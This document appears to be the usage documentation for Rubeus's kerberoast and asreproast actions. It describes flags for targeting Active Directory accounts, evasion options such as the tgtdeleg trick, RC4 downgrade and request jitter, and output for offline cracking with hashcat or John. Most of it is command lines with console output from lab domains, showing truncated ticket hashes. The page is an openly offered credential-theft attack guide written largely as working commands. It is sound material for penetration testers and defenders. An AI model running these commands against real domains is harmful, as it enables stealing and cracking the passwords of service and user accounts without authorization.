Roasting

Breakdown of the roasting commands:

kerberoast

The kerberoast action replaces the SharpRoast project's functionality. Like SharpRoast, this action uses the KerberosRequestorSecurityToken.GetRequest Method()(https://msdn.microsoft.com/en-us/library/system.identitymodel.tokens.kerberosrequestorsecuritytoken.getrequest(v=vs.110).aspx) method that was contributed to PowerView by @machosec in order to request the proper service ticket (for default behavior, opsec table for more detail). Unlike SharpRoast, this action now performs proper ASN.1 parsing of the result structures.

With no other arguments, all user accounts with SPNs set in the current domain are Kerberoasted, requesting their highest supported encryption type (see the opsec table). The /spn:X argument roasts just the specified SPN, the /user:X argument roasts just the specified user, and the /ou:X argument roasts just users in the specific OU. The /domain and /dc arguments are optional, pulling system defaults as other actions do.

The /stats flag will output statistics about kerberoastable users found, including a breakdown of supported encryption types and years user passwords were last set. This flag can be combined with other targeting options.

The /outfile:FILE argument outputs roasted hashes to the specified file, one per line.

If the /simple flag is specified, roasted hashes will be output to the console, one per line.

If the /nowrap flag is specified, Kerberoast results will not be line-wrapped.

If the the TGT /ticket:X supplied (base64 encoding of a .kirbi file or the path to a .kirbi file on disk) that TGT is used to request the service service tickets during roasting. If /ticket:X is used with /spn:Y or /spns:Y (/spns: can be a file containing each SPN on a new line or a comma-separated list) then no LDAP searching happens for users, so it can be done from a non-domain joined system in conjunction with /dc:Z.

If the /tgtdeleg flag is supplied, the tgtdeleg trick it used to get a usable TGT for the current user, which is then used for the roasting requests. If this flag is used, accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested.

If the /aes flag is supplied, accounts with AES encryption enabled in msDS-SupportedEncryptionTypes are enumerated and AES service tickets are requested.

If the /ldapfilter:X argument is supplied, the supplied LDAP filter will be added to the final LDAP query used to find Kerberoastable users.

If the /rc4opsec flag is specified, the tgtdeleg trick is used, and accounts without AES enabled are enumerated and roasted.

If you want to use alternate domain credentials for Kerberoasting (and searching for users to Kerberoast), they can be specified with /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD.

If the /pwdsetafter:MM-dd-yyyy argument is supplied, only accounts whose password was last changed after MM-dd-yyyy will be enumerated and roasted.

If the /pwdsetbefore:MM-dd-yyyy argument is supplied, only accounts whose password was last changed before MM-dd-yyyy will be enumerated and roasted.

If the /resultlimit:NUMBER argument is specified, the number of accounts that will be enumerated and roasted is limited to NUMBER.

If the /delay:MILLISECONDS argument is specified, that number of milliseconds is paused between TGS requests. The /jitter:1-100 flag can be combined for a % jitter.

If the /enterprise flag is used, the spn is assumed to be an enterprise principal (i.e. user@domain.com). This flag only works when kerberoasting with a TGT.

If the /autoenterprise flag is used, if roasting an SPN fails (due to an invalid or duplicate SPN) Rubeus will automatically retry using the enterprise principal. This is only useful when /spn or /spns is not supplied as Rubeus needs to know the target accounts samaccountname, which it gets when querying LDAP for the account information.

kerberoasting opsec

Here is a table comparing the behavior of various flags from an opsec perspective:

Examples

Kerberoasting all users in the current domain using the default KerberosRequestorSecurityToken.GetRequest method:

C:\Rubeus>Rubeus.exe kerberoast

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: Kerberoasting


[*] SamAccountName         : harmj0y
[*] DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName   : asdf/asdfasdf
[*] Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$AE5F019D4CDED6CD74830CC...(snip)...


[*] SamAccountName         : sqlservice
[*] DistinguishedName      : CN=SQL,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName   : MSSQLSvc/SQL.testlab.local
[*] Hash                   : $krb5tgs$23$*$testlab.local$MSSQLSvc/SQL.testlab.local*$E2B3869290...(snip)...

...(snip)...

Kerberoasting all users in a specific OU, saving the hashes to an output file:

C:\Rubeus>Rubeus.exe kerberoast /ou:OU=TestingOU,DC=testlab,DC=local /outfile:C:\Temp\hashes.txt

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: Kerberoasting

[*] Target OU              : OU=TestingOU,DC=testlab,DC=local

[*] SamAccountName         : testuser2
[*] DistinguishedName      : CN=testuser2,OU=TestingOU,DC=testlab,DC=local
[*] ServicePrincipalName   : service/host
[*] Hash written to C:\Temp\hashes.txt

[*] Roasted hashes written to : C:\Temp\hashes.txt

Perform Kerberoasting using the tgtdeleg trick to get a usable TGT, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 3 service tickets:

C:\Rubeus>Rubeus.exe kerberoast /tgtdeleg /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:3

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user
[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else
[*] Searching the current domain for Kerberoastable users
[*] Searching for accounts with lastpwdset from 01-31-2005 to 03-29-2010
[*] Up to 3 result(s) will be returned

[*] Total kerberoastable users : 3


[*] SamAccountName         : harmj0y
[*] DistinguishedName      : CN=harmj0y,OU=TestOU,DC=theshire,DC=local
[*] ServicePrincipalName   : testspn/server
[*] PwdLastSet             : 5/31/2008 12:00:02 AM
[*] Supported ETypes       : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash                   : $krb5tgs$23$*harmj0y$theshire.local$testspn/server*$F6EEFE5026CF8F02E3DC...(snip)...


[*] SamAccountName         : constraineduser
[*] DistinguishedName      : CN=constraineduser,CN=Users,DC=theshire,DC=local
[*] ServicePrincipalName   : blah/blah123
[*] PwdLastSet             : 9/5/2009 7:48:50 PM
[*] Supported ETypes       : RC4_HMAC
[*] Hash                   : $krb5tgs$23$*constraineduser$theshire.local$blah/blah123*$6F0992C377AA12...(snip)...


[*] SamAccountName         : newuser
[*] DistinguishedName      : CN=newuser,CN=Users,DC=theshire,DC=local
[*] ServicePrincipalName   : blah/blah123456
[*] PwdLastSet             : 9/12/2008 8:05:16 PM
[*] Supported ETypes       : RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash                   : $krb5tgs$23$*newuser$theshire.local$blah/blah123456*$C4561559C2A7DF07712...(snip)...

List statistics about found Kerberoastable accounts without actually sending ticket requests:

C:\Rubeus>Rubeus.exe kerberoast /stats

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] Listing statistics about target users, no ticket requests being performed.
[*] Searching the current domain for Kerberoastable users

[*] Total kerberoastable users : 4


 ----------------------------------------------------------------------
 | Supported Encryption Type                                  | Count |
 ----------------------------------------------------------------------
 | RC4_HMAC_DEFAULT                                           | 1     |
 | RC4_HMAC                                                   | 1     |
 | AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96           | 1     |
 | RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 | 1     |
 ----------------------------------------------------------------------

 ----------------------------------
 | Password Last Set Year | Count |
 ----------------------------------
 | 2019                   | 4     |
 ----------------------------------

Kerberoasting a specific user, with simplified hash output:

C:\Rubeus>Rubeus.exe kerberoast /user:harmj0y /simple

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User            : harmj0y
[*] Searching the current domain for Kerberoastable users

[*] Total kerberoastable users : 1

$krb5tgs$18$*harmj0y$theshire.local$testspn/server*$F63783C58AA153F24DFCC796A120C55C$06C6929374A2D3...(snip)...

Kerberoasting all users in a foreign trusting domain, not line-wrapping the results:

C:\Rubeus>Rubeus.exe kerberoast /domain:dev.testlab.local /nowrap

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.5.0


[*] Action: Kerberoasting

[*] Target Domain          : dev.testlab.local

[*] SamAccountName         : jason
[*] DistinguishedName      : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local
[*] ServicePrincipalName   : test/test
[*] Hash                   : $krb5tgs$23$*$dev.testlab.local$test/test@dev.testlab.local*$969339A82...(snip)...

Kerberoasting using an existing TGT:

C:\Rubeus>Rubeus.exe kerberoast /ticket:doIFujCCBbagAwIBBaEDAgEWoo...(snip)... /spn:"asdf/asdfasdf" /dc:primary.testlab.local

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.5


[*] Action: Kerberoasting

[*] Using a TGT /ticket to request service tickets

[*] Target SPN             : asdf/asdfasdf
[*] Hash                   : $krb5tgs$23$*USER$DOMAIN$asdf/asdfasdf*$4EFF99FDED690AB4616EB...(snip)...

"Opsec" Kerberoasting, using the tgtdeleg trick, filtering out AES-enabled accounts:

C:\Rubeus>Rubeus.exe kerberoast /rc4opsec

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.6


[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user
[*] Searching the current domain for Kerberoastable users
[*] Searching for accounts that only support RC4_HMAC, no AES

[*] Found 6 users to Kerberoast!

[*] SamAccountName         : harmj0y
[*] DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName   : asdf/asdfasdf
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*harmj0y$testlab.local$asdf/asdfasdf*$6B4AD4B61D37D54...(snip)...

asreproast

The asreproast action replaces the ASREPRoast project which executed similar actions with the (larger sized) BouncyCastle library. If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting. For more technical information, see this post.

Just as with the kerberoast command, if no other arguments are supplied, all user accounts not requiring with Kerberos preauth not required are roasted. The /user:X argument roasts just the specified user, and the /ou:X argument roasts just users in the specific OU. The /domain and /dc arguments are optional, pulling system defaults as other actions do.

The /outfile:FILE argument outputs roasted hashes to the specified file, one per line.

Also, if you wanted to use alternate domain credentials for kerberoasting, that can be specified with /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD.

The output /format:X defaults to John the Ripper (Jumbo version). /format:hashcat is also an option for the new hashcat mode 18200.

AS-REP roasting all users in the current domain:

C:\Rubeus>Rubeus.exe asreproast

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: AS-REP roasting

[*] Target Domain          : testlab.local

[*] SamAccountName         : dfm.a
[*] DistinguishedName      : CN=dfm.a,CN=Users,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\dfm.a'
[*] Connecting to 192.168.52.100:88
[*] Sent 163 bytes
[*] Received 1537 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$dfm.a@testlab.local:D4A4BC281B200EE35CBF4A4537792D07$D655...(snip)...

[*] SamAccountName         : TestOU3user
[*] DistinguishedName      : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$TestOU3user@testlab.local:DD6DF16B7E65223679CD703837C94FB...(snip)..

[*] SamAccountName         : harmj0y2
[*] DistinguishedName      : CN=harmj0y2,CN=Users,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\harmj0y2'
[*] Connecting to 192.168.52.100:88
[*] Sent 166 bytes
[*] Received 1407 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$harmj0y2@testlab.local:7D2E379A076BB804AF275ED51B86BF85$8...(snip)..

AS-REP roasting all users in a specific OU, saving the hashes to an output file in Hashcat format:

C:\Rubeus>Rubeus.exe asreproast /ou:OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local /format:hashcat /outfile:C:\Temp\hashes.txt

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: AS-REP roasting

[*] Target OU              : OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Target Domain          : testlab.local

[*] SamAccountName         : TestOU3user
[*] DistinguishedName      : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] Hash written to C:\Temp\hashes.txt

[*] Roasted hashes written to : C:\Temp\hashes.txt

AS-REP roasting a specific user:

C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: AS-REP roasting

[*] Target User            : TestOU3user
[*] Target Domain          : testlab.local

[*] SamAccountName         : TestOU3user
[*] DistinguishedName      : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...

AS-REP roasting all users in a foreign trusting domain:

C:\Rubeus>Rubeus.exe asreproast /domain:dev.testlab.local

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: AS-REP roasting

[*] Target Domain          : dev.testlab.local

[*] SamAccountName         : devuser3
[*] DistinguishedName      : CN=devuser3,CN=Users,DC=dev,DC=testlab,DC=local
[*] Using domain controller: dev.testlab.local (192.168.52.105)
[*] Building AS-REQ (w/o preauth) for: 'dev.testlab.local\devuser3'
[*] Connecting to 192.168.52.105:88
[*] Sent 175 bytes
[*] Received 1448 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$devuser3@dev.testlab.local:650B881E44B92FB6A378DD21E8B020...(snip)...

AS-REP roasting users in a foreign non-trusting domain using alternate credentials:

C:\Rubeus>Rubeus.exe asreproast /domain:external.local /creduser:"EXTERNAL.local\administrator" /credpassword:"Password123!"

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: AS-REP roasting

[*] Target Domain          : external.local

[*] Using alternate creds  : EXTERNAL.local\administrator

[*] SamAccountName         : david
[*] DistinguishedName      : CN=david,CN=Users,DC=external,DC=local
[*] Using domain controller: external.local (192.168.52.95)
[*] Building AS-REQ (w/o preauth) for: 'external.local\david'
[*] Connecting to 192.168.52.95:88
[*] Sent 165 bytes
[*] Received 1376 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$david@external.local:9F5A33465C53056F17FEFDF09B7D36DD$47DBAC3...(snip)...

Last updated